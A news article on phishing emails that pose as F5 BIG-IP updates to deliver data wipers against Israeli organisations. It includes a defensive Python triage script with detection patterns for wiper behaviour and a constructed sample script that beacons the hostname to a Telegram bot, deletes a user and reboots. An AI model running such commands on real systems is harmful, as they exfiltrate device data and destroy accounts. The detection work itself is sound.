Massive data Destruction in Israel: Fake F5 BIG-IP Update as a New Tool in Cyber Warfare

Brother

Hacktivists have opened a new front in the fight against Israel.

Israel's National Cybersecurity Authority warns of phishing attacks disguised as security updates for F5 Networks' BIG-IP devices. The attacks distribute wipers for both Windows and Linux.

Israel's National Cyber Directorate (INCD) acts as a CERT responsible for protecting the country from cyber threats and warning organizations and citizens about known attacks.

Since October, Israel has been subject to large-scale cyber attacks by hackers supporting Palestine and Iran, who steal and destroy data belonging to Israeli organizations. In November, a new wiper called BiBi Wiper was discovered, targeting both Linux and Windows devices and erasing data on the machines it infects. The creation of the program is attributed to hacktivists who support Hamas.

INCD warned about a new phishing attack in which data-wiping tools were sent by email under the guise of a warning about a zero-day vulnerability in F5 BIG-IP devices. The pro-Palestinian hacktivist group Handala claimed responsibility for the attack, asserting that its members had penetrated many Israeli networks. However, experts were unable to confirm the group's claims.

Phishing emails warn about the active use of the F5 BIG-IP vulnerability in attacks and encourage Israeli organizations to download and install a security update. For Windows users, emails offer a file called F5UPDATER.exe, and for Linux — a script called update.sh.


Wiper on Windows pretending to be an F5 security update

Both versions of the wiper attempt to mimic the F5 security update by displaying the company's logo. After the "Update" button is clicked, the program sends data about the device to a Telegram channel and tries to erase all data on the computer. However, according to BleepingComputer, the program contains bugs and does not delete all data.

The Linux version is a script that first installs the programs it needs for wiping data, such as xfsprogs, wipe, and parted. The script first deletes all users on the system, then uses the "wipe" command to destroy their associated directories. It then attempts to delete all system files and partitions on the Linux device. When finished, the computer is rebooted so that the partition changes take effect. Like the Windows version, the Linux version also transmits device information and status updates to the Telegram channel.
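For defenders triaging a suspicious "update.sh" attachment, the behaviours listed above (installing wipe/xfsprogs/parted, deleting users, wiping directories, editing partitions, beaconing to Telegram, forcing a reboot) make usable static indicators. The script below is an added example, not part of the original post or any INCD/F5 publication; the regexes are assumed heuristics and both sample scripts are constructed stand-ins that do nothing destructive.

```python
import re

# Assumed heuristics derived from the behaviour described in the post;
# not a published signature.
INDICATORS = {
    "installs_wipe_tools": re.compile(
        r"\b(apt(-get)?|yum|dnf)\b.*\binstall\b.*\b(wipe|xfsprogs|parted)\b"),
    "deletes_users": re.compile(r"\b(userdel|deluser)\b"),
    "wipes_directories": re.compile(r"\bwipe\s+-"),
    "edits_partitions": re.compile(r"\bparted\b.*\b(rm|mklabel)\b"),
    "telegram_beacon": re.compile(r"api\.telegram\.org/bot"),
    "forces_reboot": re.compile(r"\b(reboot|shutdown\s+-r)\b"),
}

def triage_script(text):
    """Return the set of indicator names matched on any non-comment line."""
    hits = set()
    for name, pattern in INDICATORS.items():
        for line in text.splitlines():
            stripped = line.strip()
            if stripped.startswith("#"):
                continue  # shebang and comments carry no behaviour
            if pattern.search(stripped):
                hits.add(name)
                break
    return hits

def verdict(hits):
    """Destructive action plus an exfil channel is the wiper pattern."""
    destructive = {"deletes_users", "wipes_directories", "edits_partitions"}
    if hits & destructive and "telegram_beacon" in hits:
        return "likely wiper"
    if hits & destructive:
        return "suspicious"
    return "no wiper indicators"

# Constructed sample mirroring only the structure described in the post
# (install line, Telegram beacon, user deletion, reboot); it wipes nothing.
SAMPLE_UPDATE_SH = """#!/bin/bash
# "F5 BIG-IP security update" (constructed sample, not the real file)
apt-get install -y xfsprogs wipe parted
curl -s "https://api.telegram.org/bot<TOKEN>/sendMessage" -d "text=$(hostname)"
userdel someuser
reboot
"""

# Constructed benign installer for comparison.
BENIGN_SH = """#!/bin/bash
apt-get update && apt-get install -y curl
curl -fsSL https://example.invalid/agent.tar.gz -o /tmp/agent.tar.gz
"""
```

Run `verdict(triage_script(SAMPLE_UPDATE_SH))` on the constructed sample to get "likely wiper"; the benign installer yields "no wiper indicators".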

Wipers have become a serious problem for Israel, as hacktivists often use them in destructive attacks aimed at disrupting the country's operations and economy. As always, the best protection is to download files from email only if they come from a verified and trusted source. In addition, security updates should only be downloaded directly from the hardware manufacturer, never from third-party sites.